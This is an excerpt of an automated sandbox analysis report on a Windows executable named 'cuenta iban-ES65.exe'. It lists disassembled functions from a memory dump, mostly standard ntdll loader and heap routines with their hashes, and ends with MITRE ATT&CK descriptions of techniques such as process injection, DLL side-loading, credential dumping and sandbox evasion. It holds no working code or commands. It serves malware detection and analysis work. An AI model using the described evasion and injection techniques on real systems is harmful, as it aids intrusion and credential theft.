RtlDebugPrintTimes.NTDLL ref: 377AFB15

Strings

minkernel\ntdll\ldrdload.c, xrefs: 377AFA68
Unknown, xrefs: 377AFA42, 377AFA54
LdrpRedirectDelayloadFailure, xrefs: 377AFA5E
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 377AFA58
$, xrefs: 377AFABD

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 1a630b6cad5c1f8bdd5de681facf53793cbdad020334a9d5a8cbce662cc4c150
Instruction ID: 77aec49fd93d4bbd6e02cb97d9322aa9b71c8c25c8b5dd4d4b42de6e8065de86
Opcode Fuzzy Hash: 1a630b6cad5c1f8bdd5de681facf53793cbdad020334a9d5a8cbce662cc4c150
Instruction Fuzzy Hash: FA414FB5A00209EBEB01DF99C885ADEBBB6FF49764F104569E904BB340D775E902CB90

Uniqueness

Uniqueness Score: -1.00%

Function 37726565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37726614
RtlDebugPrintTimes.NTDLL ref: 3772665F

Strings

LdrpLoadShimEngine, xrefs: 3778984A, 3778988B
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37789885
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37789843
minkernel\ntdll\ldrinit.c, xrefs: 37789854, 37789895

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 60e3285276784ced5c6e93a1c3df2c915ab0174c4e6b83a889cc120365505591
Instruction ID: 721fcbb7f80d4c34d3f9bdfbaa9a64a2f2d72d4ff7b3e1c5d7e50ef1d3ec59fe
Opcode Fuzzy Hash: 60e3285276784ced5c6e93a1c3df2c915ab0174c4e6b83a889cc120365505591
Instruction Fuzzy Hash: 6A514571B00344AFDB10DBA8C85AB9D7BB2BB44718F04456AE460FF695DB789C42DB81

Uniqueness

Uniqueness Score: -1.00%

Function 3775DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3779F41B

Strings

HEAP: , xrefs: 3779F451
, passed to %s, xrefs: 3779F46C
Invalid heap signature for heap at %p, xrefs: 3779F45D
HEAP[%wZ]: , xrefs: 3779F444
RtlUnlockHeap, xrefs: 3779F467

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 540b9d79e61a875003f55a55b24f14f64bd7a6f3465a14e0acb170fc8b0bc84b
Instruction ID: 1bfbf3a8bd7e251df3394f5cac0ae7b1ef80d78f2d845fc92600329991045c1b
Opcode Fuzzy Hash: 540b9d79e61a875003f55a55b24f14f64bd7a6f3465a14e0acb170fc8b0bc84b
Instruction Fuzzy Hash: 5B411474601700DFE701CF24C888BAAB7A5FF41370F1089A9E415AF791CB38A982CB92

Uniqueness

Uniqueness Score: -1.00%

Function 377DECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377DEDD0
RtlDebugPrintTimes.NTDLL ref: 377DEE45

Strings

---------------------------------------, xrefs: 377DEDF9
HEAP: , xrefs: 377DECDD
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 377DEDE3
Entry Heap Size , xrefs: 377DEDED

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 5889ab2ded0097fbbe168207f0eb4efff7ce1adb02a437cd731d1bf46bb1e1bf
Instruction ID: cdf6aca58e93eb5b0c4bf46ee6dcead3f17545fcab948bb15b156e93336850c5
Opcode Fuzzy Hash: 5889ab2ded0097fbbe168207f0eb4efff7ce1adb02a437cd731d1bf46bb1e1bf
Instruction Fuzzy Hash: 5541E339620219DFC702DF14C494A197BE2FF49765769C869D418AF321DB75EC42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3775DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3779F561

Strings

HEAP: , xrefs: 3779F597
, passed to %s, xrefs: 3779F5B2
RtlLockHeap, xrefs: 3779F5AD
Invalid heap signature for heap at %p, xrefs: 3779F5A3
HEAP[%wZ]: , xrefs: 3779F58A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 366257500f575b3fcfa3504881175c4ee95f28e72234d6a0323ec8acaef9715e
Instruction ID: 73f7ae81fbfced32f4f51f9165f76d3666445d58f72305b9ddf036c5d56c5768
Opcode Fuzzy Hash: 366257500f575b3fcfa3504881175c4ee95f28e72234d6a0323ec8acaef9715e
Instruction Fuzzy Hash: 14315575201784FFE712CB24C44CF9937E6EF02770F0048A5E4516F661DB69AA41CE52

Uniqueness

Uniqueness Score: -1.00%

Function 37739046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37792360

Strings

@, xrefs: 37739095
$, xrefs: 377390B1

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 0032b04a1848d73b0d6ef45f47702b90b55ad58f0cf85a3e86cc7c3900665f59
Instruction ID: 7b2c4f520354353985540b86ed273cd3cd2caea07c141288e9506da6a33dd438
Opcode Fuzzy Hash: 0032b04a1848d73b0d6ef45f47702b90b55ad58f0cf85a3e86cc7c3900665f59
Instruction Fuzzy Hash: AC817F72D012699BDB21CF54CC45BEEB7B8AF09710F0045EAE919BB250E7349E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 37764C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37764C84

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 377A344A, 377A3476
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 377A3439
Querying the active activation context failed with status 0x%08lx, xrefs: 377A3466
LdrpFindDllActivationContext, xrefs: 377A3440, 377A346C

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 90726f4328b9d7dbdcaf8e142d3cd806b4e15e18d0ab3936239c8435d497e345
Instruction ID: 609159ef04df01b2f0a59aea7c59b85ed252e55c5b3415ace351d5a3d67bf56c
Opcode Fuzzy Hash: 90726f4328b9d7dbdcaf8e142d3cd806b4e15e18d0ab3936239c8435d497e345
Instruction Fuzzy Hash: 2E3129B6E00311AFFB119B04884DB2576A6BB457BCF428966DC006F748E764AE80C792

Uniqueness

Uniqueness Score: -1.00%

Function 37750AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37750BFC

Strings

LdrpCheckModule, xrefs: 37799F24
Failed to allocated memory for shimmed module list, xrefs: 37799F1C
minkernel\ntdll\ldrinit.c, xrefs: 37799F2E

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 6300571ea342509b9a36060abe7c391daa14de22360421944c3d8f0e767c5366
Instruction ID: fdb816d3338de02a42d71d5bc45143fd31a462844dbff02a2133cc3edd7a5850
Opcode Fuzzy Hash: 6300571ea342509b9a36060abe7c391daa14de22360421944c3d8f0e767c5366
Instruction Fuzzy Hash: 0471D375A002099FEB04DF68C895BAEB7F1FB85718F14886DE805EF650E738AD42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 3775EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c4a4e9377e3b28c860f7dfc3cba5ca73e656c0f1772be2c32a5b174f49dfc7
Instruction ID: 079d25699d19083277e5ab7f0aeff2eee8273b4407b69a9340e2c9c6699268fd
Opcode Fuzzy Hash: 74c4a4e9377e3b28c860f7dfc3cba5ca73e656c0f1772be2c32a5b174f49dfc7
Instruction Fuzzy Hash: DAE10374E00708DFDB25CFA9D984A9DBBF6FF48320F14492AE555AB260DB74A842CF50

Uniqueness

Uniqueness Score: -1.00%

Function 3780A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3780A0F7
RtlDebugPrintTimes.NTDLL ref: 3780A1AA
RtlDebugPrintTimes.NTDLL ref: 3780A1CE
RtlDebugPrintTimes.NTDLL ref: 3780A1E3

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7e500d6bdef07677f898e9f7992d94cbc2ff9bb53856721a2b8f089462a471bb
Instruction ID: dfb52741a1af46ff518b2cc23b73d18235a388bf5c4c555e9fcc3451f54881b8
Opcode Fuzzy Hash: 7e500d6bdef07677f898e9f7992d94cbc2ff9bb53856721a2b8f089462a471bb
Instruction Fuzzy Hash: 11517C79704616EFEB08CE28CCD1AA977E1BBA9360F10406DD906D7710DB75AC49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 37767A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37767A72
BaseThreadInitThunk.KERNEL32 ref: 37767A7C
RtlDebugPrintTimes.NTDLL ref: 377A47F8
RtlDebugPrintTimes.NTDLL ref: 377A487B

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: e57d4e10d1d9956bd2e944ed2fd0484c85e3ea3624b47febea3653bccaa756b7
Instruction ID: 3b6f239d96c76002eff507eb924baa125d6f862687e12e65e04b04c88e93cc56
Opcode Fuzzy Hash: e57d4e10d1d9956bd2e944ed2fd0484c85e3ea3624b47febea3653bccaa756b7
Instruction Fuzzy Hash: BE310275E40218EFDB05DFA8D849A9DBBF1BB48721F10826AE911BB390DB395901CF51

Uniqueness

Uniqueness Score: -1.00%

Function 377D8B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 377D8B9E
{}7, xrefs: 377D8EBE

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: ${}7
API String ID: 0-2003186822
Opcode ID: a76bdbfd979b6042b65d4c884a4de1367c42b912d21287dfe592196c1bc0e2aa
Instruction ID: 3dc0d6adcc7389d5997b5d86d335964aaead5d3393862ed9ae2a7770a02bf81b
Opcode Fuzzy Hash: a76bdbfd979b6042b65d4c884a4de1367c42b912d21287dfe592196c1bc0e2aa
Instruction Fuzzy Hash: 45B1AC716093419FD710CF29C880B5BBBE5EF94760F404A6EF9A89F2A0D730E904DB92

Uniqueness

Uniqueness Score: -1.00%

Function 37764B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 37764BE3
Flst, xrefs: 37764BB6

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 5cf979a8843c1e01cfdcd43df988ae957867766cfa7a28708e414b89c83d2986
Instruction ID: 5af044c508cd8eda5d6f302759f0bffab5082c3d4e88253b778ee6d8c34fc7c4
Opcode Fuzzy Hash: 5cf979a8843c1e01cfdcd43df988ae957867766cfa7a28708e414b89c83d2986
Instruction Fuzzy Hash: 6A519DB5E007488FEB15CF94C488759FBF6FF447A9F14892AD8499F244EB749A81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3772E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3772E709

Strings

^r7, xrefs: 3778D957, 3778D9A0, 3772E6C1

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ^r7
API String ID: 3446177414-14751198
Opcode ID: 04aee6a4eef3019efe657c7a11e207e448043d1676e2e90508ebb94298ac3e1a
Instruction ID: 66b1f86554b653ca2cc48c5f85eee704a87d5b412762c9d088674ae004ccfff0
Opcode Fuzzy Hash: 04aee6a4eef3019efe657c7a11e207e448043d1676e2e90508ebb94298ac3e1a
Instruction Fuzzy Hash: FF41AFB9A10201DFD705CF19C4886657BF6FF98724B10846AEC18DF360DBB4E891DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 3772DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3772DFE0

Strings

0, xrefs: 3772DFC0
0, xrefs: 3772DFAB

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 8296455bbf3cafe8c4cbf8337ef658946358a89f20b5e014b7a37d36faea4e3e
Instruction ID: 11655c9ce1751c8fbd1ac6e5c9fcf46b78e91748d8ae35a248156fa755d98e3c
Opcode Fuzzy Hash: 8296455bbf3cafe8c4cbf8337ef658946358a89f20b5e014b7a37d36faea4e3e
Instruction Fuzzy Hash: 51416AB1608741AFD300CF28C444A5ABBE5BF8C354F044A2EF898EB300D771EA05CB86

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cuenta iban-ES65.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

